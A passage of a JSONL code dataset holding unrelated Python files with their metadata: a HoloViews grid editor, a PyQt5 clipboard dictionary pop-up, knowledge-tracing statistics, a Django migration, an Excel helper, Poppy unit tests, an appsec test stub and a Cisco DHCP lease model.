gdf.geometry.y, gdf.polarity, **kwargs)\n xdim, ydim = self.grid.x.shape\n zs = np.ones((xdim-1, ydim-1))\n self.qmesh = hv.QuadMesh((np.array(self.grid.x), np.array(self.grid.y), zs))\n return self.qmesh.opts(**self.mesh_style, fill_alpha=0)\n\n\n def _boundary(self, data, index):\n \"Callback drawing Path element defining boundary\"\n self._selected_edge_index = index\n xs, ys = data['x'], data['y']\n lines = []\n for i in range(len(xs)-1):\n s, e = i, (i+1)\n lines.append([(xs[s], ys[s]), (xs[e], ys[e])])\n self.ready = self._ready()\n return hv.Path(lines).opts(**self.edge_style)\n\n def _start_marker(self, data):\n \"Callback to draw the start marker\"\n if len(data['x']) == 0:\n return hv.Points(None)\n return hv.Points((data['x'][0], data['y'][0]))\n\n\n def _background(self, background):\n \"\"\"\n Callback that allows the background to be switched between tile\n sources, a custom background element or None for no\n background\n \"\"\"\n elements = []\n if background != 'None':\n elements = [TILE_SOURCES[background].opts(global_extent=True, alpha=1)]\n elif background == 'None':\n if self.custom_background:\n elements = [self.custom_background]\n else:\n elements = 
[TILE_SOURCES[list(TILE_SOURCES.keys())[0]].opts(alpha=0)]\n return hv.Overlay(elements)\n\n\n def view(self):\n \"Main entry point for using the GridEditor after construction\"\n self.polarity_link = PolaritySwap(self.nodes)\n param_stream = hv.streams.Params(self,\n ['generate_mesh', 'hide_mesh'],\n transient=True)\n\n elements = [hv.DynamicMap(self._background, streams=[self.param.background]),\n self.boundary_dmap.apply.opts(line_width=self.param.edge_width),\n self.start_marker,\n self.nodes,\n hv.DynamicMap(self._generate_mesh,\n streams=[param_stream])]\n\n hvobj = hv.Overlay(elements).collate()\n self.widgets = pn.Param(self.param,\n widgets={'edge_select_mode': pn.widgets.Toggle})\n obj = pn.Row(pn.Column(self.widgets,\n pn.widgets.FileDownload(callback=self._geojson,\n filename='boundary.geojson')),\n hvobj.opts(width=self.width, height=self.height))\n self.param.trigger('ready')\n return obj\n", "sub_path": "hologridgen/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 15715, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "holoviews.plotting.bokeh.callbacks.Link", "line_number": 15, "usage_type": "name"}, {"api_name": "holoviews.plotting.bokeh.callbacks.LinkCallback", "line_number": 23, "usage_type": "name"}, {"api_name": "holoviews.plotting.bokeh.callbacks.Link._callbacks", "line_number": 52, "usage_type": "attribute"}, {"api_name": "holoviews.plotting.bokeh.callbacks.Link", "line_number": 52, "usage_type": "name"}, {"api_name": "geoviews.tile_sources.tile_sources.items", "line_number": 58, "usage_type": "call"}, {"api_name": "geoviews.tile_sources", "line_number": 58, "usage_type": "attribute"}, {"api_name": "param.Parameterized", "line_number": 62, "usage_type": "attribute"}, {"api_name": "param.Integer", "line_number": 80, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 83, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 86, "usage_type": "call"}, {"api_name": "param.ClassSelector", "line_number": 93, "usage_type": "call"}, {"api_name": "pygridgen.Focus", "line_number": 93, "usage_type": "attribute"}, {"api_name": "param.ClassSelector", "line_number": 99, "usage_type": "call"}, {"api_name": "pygridgen.grid", "line_number": 99, "usage_type": "attribute"}, {"api_name": "param.Boolean", "line_number": 104, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 110, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 113, "usage_type": "call"}, {"api_name": "param.Parameter", "line_number": 116, "usage_type": "call"}, {"api_name": "param.ObjectSelector", "line_number": 120, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 128, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 134, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 138, "usage_type": "call"}, {"api_name": "param.Dict", "line_number": 145, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 154, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 157, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 159, "usage_type": "call"}, {"api_name": "param.Integer", "line_number": 162, "usage_type": "call"}, {"api_name": "param.Event", "line_number": 165, "usage_type": "call"}, {"api_name": "param.Event", "line_number": 167, "usage_type": "call"}, {"api_name": "param.Event", "line_number": 169, "usage_type": "call"}, {"api_name": "holoviews.dim", 
"line_number": 188, "usage_type": "call"}, {"api_name": "holoviews.dim", "line_number": 189, "usage_type": "call"}, {"api_name": "holoviews.streams.PointDraw", "line_number": 193, "usage_type": "call"}, {"api_name": "holoviews.streams", "line_number": 193, "usage_type": "attribute"}, {"api_name": "holoviews.DynamicMap", "line_number": 198, "usage_type": "call"}, {"api_name": "holoviews.DynamicMap", "line_number": 203, "usage_type": "call"}, {"api_name": "holoviews.streams.Selection1D", "line_number": 205, "usage_type": "call"}, {"api_name": "holoviews.streams", "line_number": 205, "usage_type": "attribute"}, {"api_name": "holoviews.DynamicMap", "line_number": 207, "usage_type": "call"}, {"api_name": "holoviews.QuadMesh", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 212, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 240, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 241, "usage_type": "call"}, {"api_name": "geopandas.points_from_xy", "line_number": 241, "usage_type": "call"}, {"api_name": "panel.widgets", "line_number": 270, "usage_type": "attribute"}, {"api_name": "panel.depends", "line_number": 266, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 280, "usage_type": "call"}, {"api_name": "panel.depends", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 299, "usage_type": "call"}, {"api_name": "holoviews.Points", "line_number": 300, "usage_type": "call"}, {"api_name": "pygridgen.Gridgen", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 318, "usage_type": "call"}, {"api_name": "holoviews.QuadMesh", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 319, "usage_type": "call"}, {"api_name": "holoviews.Path", "line_number": 332, "usage_type": "call"}, {"api_name": "holoviews.Points", "line_number": 337, "usage_type": "call"}, {"api_name": "holoviews.Points", "line_number": 338, "usage_type": "call"}, {"api_name": "holoviews.Overlay", "line_number": 355, "usage_type": "call"}, {"api_name": "holoviews.streams.Params", "line_number": 361, "usage_type": "call"}, {"api_name": "holoviews.streams", "line_number": 361, "usage_type": "attribute"}, {"api_name": "holoviews.DynamicMap", "line_number": 365, "usage_type": "call"}, {"api_name": "holoviews.DynamicMap", "line_number": 369, "usage_type": "call"}, {"api_name": "holoviews.Overlay", "line_number": 372, "usage_type": "call"}, {"api_name": "panel.Param", "line_number": 373, "usage_type": "call"}, {"api_name": "panel.widgets", "line_number": 374, "usage_type": "attribute"}, {"api_name": "panel.Row", "line_number": 375, "usage_type": "call"}, {"api_name": "panel.Column", "line_number": 375, "usage_type": "call"}, {"api_name": "panel.widgets.FileDownload", "line_number": 376, "usage_type": "call"}, {"api_name": "panel.widgets", "line_number": 376, "usage_type": "attribute"}]}
+{"seq_id": "453249869", "text": "# encoding=utf-8\nimport sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nimport dict_meaning\nfrom dictionary_ui import Ui_MainWindow\n\nclass MainWindow(QMainWindow):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tclipboard = QApplication.clipboard()\n\t\tclipboard.dataChanged.connect(self.clipboard_change)\n\t\tself.ui = Ui_MainWindow()\n\t\tself.ui.setupUi(self)\n\t\tself.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint |\n\t\t\t\t\t\t\tQtCore.Qt.FramelessWindowHint\n\t\t\t\t\t\t\t# QtCore.Qt.WindowNoState \n\t\t\t\t\t\t\t# QtCore.Qt.Tool)\n\t\t)\n\t\tself.move(QApplication.desktop().width() - self.width(), QApplication.desktop().height() - self.height())\n\t\tself.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n\t\tself.show()\n\t\tQtWidgets.QShortcut(QtGui.QKeySequence(\"Esc\"), self, self.hide)\n\n\t\n\tdef search(self):\n\t\tword = self.ui.lineEdit.text()\n\t\tmeaning = dict_meaning.get_meaning(word)\n\t\tif meaning is not None:\n\t\t\ttext = ''\n\t\t\tfor i in meaning:\n\t\t\t\ttext += i\n\t\t\t\ttext += '\\n'\n\t\t\tself.ui.label.setText(text)\n\t\t\tself.ui.lineEdit.selectAll()\n\t\telse:\n\t\t\tself.ui.lineEdit.selectAll()\n\t\n\tdef clipboard_change(self):\n\t\tclipboard = QApplication.clipboard()\n\t\tdata = clipboard.mimeData()\n\t\tself.ui.lineEdit.setText(data.text())\n\t\tself.search()\n\t\tself.show()\n\t\t\n\nif __name__ == '__main__':\n\tapp = QApplication([])\n\twindow = MainWindow()\n\t# app.connect(window,window.close,app,app.quit)\n\t# app.quitOnLastWindowClosed()\n\tapp.exec()\n\t# sys.exit(0)", "sub_path": "dictionary.py", "file_name": "dictionary.py", "file_ext": "py", "file_size_in_byte": 1451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.clipboard", "line_number": 11, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 11, "usage_type": "name"}, {"api_name": "dictionary_ui.Ui_MainWindow", "line_number": 13, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 15, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.desktop", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 20, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QShortcut", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QKeySequence", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 23, "usage_type": "name"}, {"api_name": "dict_meaning.get_meaning", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication.clipboard", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "629952684", "text": "# coding: utf-8\n# 2019/8/24 @ tongshiwei\n\n__all__ = [\"analysis_records\"]\n\nfrom tqdm import tqdm\nimport json\n\n\ndef analysis_records(source):\n ku_set = set()\n records_num = 0\n seq_count = 0\n correct_num = 0\n with open(source) as f:\n for line in tqdm(f, \"doing statistics\"):\n seq_count += 1\n responses = json.loads(line)\n records_num += len(responses)\n correct_num += len([r[1] for r in responses if int(r[1]) == 1])\n ku_set.update(set([_id for _id, _ in responses]))\n\n print(\"in %s\" % source)\n print(\"knowledge units number: %s\" % len(ku_set))\n print(\"records number: %s\" % records_num)\n print(\"correct records number: %s\" % correct_num)\n print(\"the number of sequence: %s\" % seq_count)\n\n\ndef analysis_edges(src, threshold=None):\n edge_num = 0\n\n with open(src) as f:\n graph_edges = json.load(f)\n\n for edge in graph_edges:\n if len(edge) == 2:\n edge_num += 1\n elif len(edge) >= 3:\n if threshold is None:\n edge_num += 1\n elif edge[2] >= threshold:\n edge_num += 1\n else: # pragma: no cover\n raise ValueError(\"each edge in src should have at least two element\")\n\n print(\"in %s\" % src)\n print(\"%s edges\" % edge_num)\n", "sub_path": "EduData/Task/KnowledgeTracing/statistics.py", "file_name": "statistics.py", "file_ext": "py", "file_size_in_byte": 1318, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tqdm.tqdm", "line_number": 16, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "489303678", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('miseenplace', '0003_recipestep'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RecipeIngredient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('quantity', models.FloatField()),\n ('ingredient', models.ForeignKey(to='miseenplace.Ingredient')),\n ('recipe', models.ForeignKey(to='miseenplace.Recipe')),\n ],\n ),\n migrations.AddField(\n model_name='recipe',\n name='recipe_ingredients',\n field=models.ManyToManyField(to='miseenplace.Ingredient', through='miseenplace.RecipeIngredient'),\n ),\n ]\n", "sub_path": "miseenplace/migrations/0004_auto_20151225_0629.py", "file_name": "0004_auto_20151225_0629.py", "file_ext": "py", "file_size_in_byte": 902, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "607953890", "text": "# -*- coding: utf-8 -*-\n# __author__:黄贝尔\n# 2021-04-24\nfrom openpyxl import load_workbook\n\nfrom config.VarConfig import excelpath\n\n\nclass Excel_tools:\n\n def read_work_book(self,filename):\n '''\n 加载文件\n :param filename: excel文件地址\n '''\n try:\n self.workbook=load_workbook(filename)\n except Exception as e:\n print(e)\n\n def read_work_sheet(self,sheetname):\n '''\n 通过表名获取表\n :param sheetname: 表名\n :return:\n '''\n try:\n self.sheet=self.workbook[sheetname]\n except Exception as e:\n print(e)\n\n def get_max_rows(self):\n '''\n 获取行数,从1开始\n :return:\n '''\n return self.sheet.max_row\n\n def get_max_col(self):\n '''\n 获取列数,从1开始\n :return:\n '''\n return self.sheet.max_column\n\n def get_row_data(self,row):\n '''\n 获取某一行的数据\n :param row: 行数\n :return:\n '''\n col = self.sheet.max_column\n row_data = []\n for i in range(1, col + 1):\n cell_value = self.sheet.cell(row=row, column=i).value\n row_data.append(cell_value)\n return row_data\n\n def get_specific_data(self,row,col):\n '''\n 获取具体单元格的值\n :return:\n '''\n cell_value=self.sheet.cell(row=row,column=col).value\n return cell_value\n\n def get_all_data(self):\n '''\n 获取sheet中所有内容\n :return:\n '''\n row1 = self.sheet.max_row\n row_datas = []\n for i in range(1, row1 + 1):\n value = self.get_row_data(i)\n row_datas.append(value)\n return row_datas\n\n def get_all_dic_data(self):\n '''\n 将第一行和下面每一条数据拼接成字典,每一行被一个字典包括,大字典的key是行数\n :return:\n '''\n frist = self.get_row_data(1)\n row1 = self.sheet.max_row\n row_datas= {}\n for i in range(2, row1 + 1):\n value = self.get_row_data(i)\n if value[0]!=None:\n datas=dict(zip(frist,value))\n row_datas[i]=datas\n return row_datas\n\n def write_specific_data(self,row,col,value):\n self.sheet.cell(row=row,column=col,value=value)\n self.workbook.save(excelpath)\n self.workbook.close()\n\n\nif __name__ == '__main__':\n data=Excel_tools()\n data.read_work_book(excelpath)\n data.read_work_sheet('Sheet1')\n # print(data.get_all_data())\n print(data.get_all_dic_data())\n #print(data.get_row_data(3))\n # data.write_specific_data(5,5,111)\n # print(data.get_specific_data(5,5))\n\n\n\n", "sub_path": "utils/exceltools.py", "file_name": "exceltools.py", "file_ext": "py", "file_size_in_byte": 2787, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 17, "usage_type": "call"}, {"api_name": "config.VarConfig.excelpath", "line_number": 96, "usage_type": "argument"}, {"api_name": "config.VarConfig.excelpath", "line_number": 102, "usage_type": "argument"}]}
+{"seq_id": "141951318", "text": "# Copyright (c) 2015 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Unittests for TaskFlow distributed_task driver implementation.\"\"\"\n\nimport mock\n\nfrom poppy.distributed_task.utils import memoized_controllers\nfrom tests.unit import base\n\n\nclass TestMemoizeUtils(base.TestCase):\n\n def setUp(self):\n super(TestMemoizeUtils, self).setUp()\n\n rax_dns_set_credentials = mock.patch('pyrax.set_credentials')\n rax_dns_set_credentials.start()\n self.addCleanup(rax_dns_set_credentials.stop)\n\n rax_dns = mock.patch('pyrax.cloud_dns')\n rax_dns.start()\n self.addCleanup(rax_dns.stop)\n\n def test_memoization_service_controller(self):\n service_controller_first = \\\n memoized_controllers.task_controllers('poppy')\n service_controller_cached = \\\n memoized_controllers.task_controllers('poppy')\n\n self.assertEqual(id(service_controller_first),\n id(service_controller_cached))\n\n def test_memoization_storage_controller(self):\n service_controller_first, storage_controller_first = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n service_controller_cached, storage_controller_cached = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n\n self.assertEqual(id(service_controller_first),\n id(service_controller_cached))\n self.assertEqual(id(storage_controller_first),\n id(storage_controller_cached))\n\n def test_memoization_dns_controller(self):\n service_controller_first, dns_controller_first = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n service_controller_cached, dns_controller_cached = \\\n memoized_controllers.task_controllers('poppy', 'storage')\n\n self.assertEqual(id(service_controller_first),\n id(service_controller_cached))\n self.assertEqual(id(dns_controller_first),\n id(dns_controller_cached))\n", "sub_path": "tests/unit/distributed_task/utils/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 2566, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tests.unit.base.TestCase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tests.unit.base", "line_number": 24, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 29, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 33, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 39, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 39, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 41, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 41, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 48, "usage_type": "call"}, {"api_name": 
"poppy.distributed_task.utils.memoized_controllers", "line_number": 48, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 50, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 50, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 59, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 59, "usage_type": "name"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers.task_controllers", "line_number": 61, "usage_type": "call"}, {"api_name": "poppy.distributed_task.utils.memoized_controllers", "line_number": 61, "usage_type": "name"}]}
+{"seq_id": "301587203", "text": "# Unless explicitly stated otherwise all files in this repository are licensed under the the Apache License Version 2.0.\n# This product includes software developed at Datadog (https://www.datadoghq.com/).\n# Copyright 2021 Datadog, Inc.\n\nfrom utils import BaseTestCase, context, released\nimport pytest\n\n\nif context.library == \"cpp\":\n pytestmark = pytest.mark.skip(\"not relevant\")\n\n\n@released(golang=\"?\", dotnet=\"?\", java=\"?\", nodejs=\"?\", php=\"?\", python=\"?\", ruby=\"?\")\nclass Test_Scrubbing(BaseTestCase):\n def test_basic(self):\n raise NotImplementedError\n", "sub_path": "tests/appsec/test_PII.py", "file_name": "test_PII.py", "file_ext": "py", "file_size_in_byte": 567, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.context.library", "line_number": 9, "usage_type": "attribute"}, {"api_name": "utils.context", "line_number": 9, "usage_type": "name"}, {"api_name": "pytest.mark.skip", "line_number": 10, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "utils.BaseTestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.released", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "645144217", "text": "# coding=UTF-8\n# **********************************************************************\n# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved\n# written by zen warriors, do not modify!\n# **********************************************************************\n\n\nfrom cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass Lease(Mo):\n \"\"\"\n The DHCP lease record.\n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.dhcp.Lease\")\n\n meta.moClassName = \"dhcpLease\"\n meta.rnFormat = \"lease-[%(ip)s]\"\n meta.category = MoCategory.REGULAR\n meta.label = \"Lease\"\n meta.writeAccessMask = 0x8008020040001\n meta.readAccessMask = 0x8008020040001\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n meta.childClasses.add(\"cobra.model.dhcp.RsClient\")\n\n meta.childNamesAndRnPrefix.append((\"cobra.model.dhcp.RsClient\", \"rsclient\"))\n\n meta.parentClasses.add(\"cobra.model.dhcp.LeaseDb\")\n\n meta.superClasses.add(\"cobra.model.nw.DbRec\")\n meta.superClasses.add(\"cobra.model.l3.DbRec\")\n meta.superClasses.add(\"cobra.model.nw.Conn\")\n meta.superClasses.add(\"cobra.model.nw.Item\")\n meta.superClasses.add(\"cobra.model.nw.GEp\")\n meta.superClasses.add(\"cobra.model.l3.ProtDbRec\")\n\n meta.rnPrefixes = [\n ('lease-', True),\n ]\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"circuitId\", \"circuitId\", 1141, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.range = [(0, 512)]\n meta.props.add(\"circuitId\", prop)\n\n prop = PropMeta(\"str\", \"clientId\", \"clientId\", 1139, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.range = [(0, 512)]\n meta.props.add(\"clientId\", prop)\n\n prop = PropMeta(\"str\", \"clientName\", \"clientName\", 1140, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.range = [(0, 512)]\n meta.props.add(\"clientName\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"end\", \"end\", 1137, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"end\", prop)\n\n prop = PropMeta(\"str\", \"hwAddr\", \"hwAddr\", 1138, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"hwAddr\", prop)\n\n prop = PropMeta(\"str\", 
\"ip\", \"ip\", 1134, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"ip\", prop)\n\n prop = PropMeta(\"str\", \"lcOwn\", \"lcOwn\", 9, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"local\"\n prop._addConstant(\"implicit\", \"implicit\", 4)\n prop._addConstant(\"local\", \"local\", 0)\n prop._addConstant(\"policy\", \"policy\", 1)\n prop._addConstant(\"replica\", \"replica\", 2)\n prop._addConstant(\"resolveOnBehalf\", \"resolvedonbehalf\", 3)\n meta.props.add(\"lcOwn\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"name\", \"name\", 16437, PropCategory.REGULAR)\n prop.label = \"Name\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 128)]\n meta.props.add(\"name\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"start\", \"start\", 1136, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"start\", prop)\n\n prop = PropMeta(\"str\", \"state\", \"state\", 1135, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"abandoned\", \"abandoned\", 5)\n prop._addConstant(\"active\", \"active\", 2)\n prop._addConstant(\"backup\", \"backup\", 7)\n prop._addConstant(\"bootp\", \"bootp\", 9)\n prop._addConstant(\"expired\", \"expired\", 3)\n prop._addConstant(\"free\", \"free\", 1)\n prop._addConstant(\"recovered\", \"recovered\", 10)\n prop._addConstant(\"released\", \"released\", 4)\n prop._addConstant(\"reserved\", \"reserved\", 8)\n prop._addConstant(\"reset\", \"reset\", 6)\n prop._addConstant(\"unknown\", \"unknown\", 0)\n meta.props.add(\"state\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n meta.namingProps.append(getattr(meta.props, \"ip\"))\n getattr(meta.props, \"ip\").needDelimiter = True\n\n def __init__(self, parentMoOrDn, ip, markDirty=True, **creationProps):\n namingVals = [ip]\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# ##################################################\n", "sub_path": "venv/Lib/site-packages/cobra/modelimpl/dhcp/lease.py", "file_name": "lease.py", "file_ext": "py", "file_size_in_byte": 6476, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cobra.mit.mo.Mo", "line_number": 22, "usage_type": "name"}, {"api_name": "cobra.mit.meta.ClassMeta", "line_number": 28, "usage_type": "call"}, {"api_name": "cobra.model.category.MoCategory.REGULAR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "cobra.model.category.MoCategory", 
